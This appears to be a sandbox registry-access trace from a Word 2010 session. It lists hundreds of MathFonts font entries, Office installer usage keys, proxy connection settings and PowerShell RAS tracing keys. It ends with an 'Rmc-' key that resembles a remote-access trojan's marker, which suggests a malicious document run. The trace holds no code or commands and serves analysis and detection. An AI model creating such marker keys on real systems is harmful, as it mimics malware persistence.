HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Rmc-M3P7YT
